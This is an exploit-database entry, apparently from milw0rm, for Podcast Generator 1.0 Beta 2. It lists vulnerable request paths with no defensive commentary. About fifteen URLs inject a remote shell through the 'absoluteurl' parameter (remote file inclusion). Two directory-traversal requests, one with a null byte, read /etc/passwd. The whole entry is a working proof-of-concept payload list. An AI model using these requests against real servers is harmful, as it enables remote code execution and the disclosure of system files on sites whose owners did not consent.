Podcast Generator 1.0 Beta 2 - Remote File Inclusion / File Disclosure

EKU-ID: 13147	CVE: OSVDB-42573;CVE-2008-1125;OSVDB-42572;OSVDB-42571;CVE-2008-1124;OSVDB-42570;OSVDB-42569;OSVDB-42568;OSVDB-42567;OSVDB-42566;OSVDB-42565;OSVDB-42564;OSVDB-42563;OSVDB-42562;OSVDB-42561;OSVDB-42560;OSVDB-42559;OSVDB-42558;OSVDB-42557	OSVDB-ID:
Author: GoLd_M	Published: 2008-02-28	Verified:
Download:

Rating

☆☆☆☆☆

### Podcast Generator <= 1.0 BETA 2 RFI / File Disclosure Remote Vulnerabilities
### http://sourceforge.net/project/showfiles.php?group_id=163847
### POC :
### I- Remote File Inclusion Vulnerabilities
### /podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=shell
### /podcastgen1.0beta2/core/admin/login.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=shell
### /podcastgen1.0beta2/core/archive_cat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=shell
### /podcastgen1.0beta2/core/recent_list.php?absoluteurl=shell
### II- Remote File Disclosure Vulnerabilities
### /podcastgen1.0beta2/core/themes.php?theme_path=../../../../../../../../../etc/passwd%00
### /podcastgen1.0beta2/download.php?filename=../../../../../../../../../etc/passwd
                                  @@@@@@@ ANA TRYAGI @@@@@@@

# milw0rm.com [2008-02-28]